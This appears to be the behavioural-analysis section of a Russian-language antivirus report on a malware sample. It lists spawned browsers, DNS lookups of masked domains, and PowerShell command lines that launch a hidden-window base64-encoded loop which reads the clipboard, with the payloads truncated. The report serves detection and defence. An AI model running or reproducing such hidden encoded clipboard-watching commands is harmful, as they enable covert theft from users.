Техническая информация
- msedge.exe
- firefox.exe
- 't.#e':443
- 't.#e':443
- DNS ASK t.#e
- DNS ASK bu#####cx-free-work.fun
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -WindowStyle Hidden -ArgumentList '-EncodedCommand dwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsAIAAkAGMAbABpAHAAIAA9ACAARwBlAHQALQBDAGwAaQBwAGIAbwBhAHIAZAA7ACAAaQB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Get-Process | Select-Object Name"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncodedCommand dwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsAIAAkAGMAbABpAHAAIAA9ACAARwBlAHQALQBDAGwAaQBwAGIAbwBhAHIAZAA7ACAAaQBmACAAKAAkAGMAbABpAHAAIAAtAGEAbgBkACAAJABjAGwAaQBwAC4AUwB0AGEAcgB0AHMAV... (со скрытым окном)
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --headless --disable-gpu
- '%ProgramFiles%\mozilla firefox\firefox.exe' --headless --disable-gpu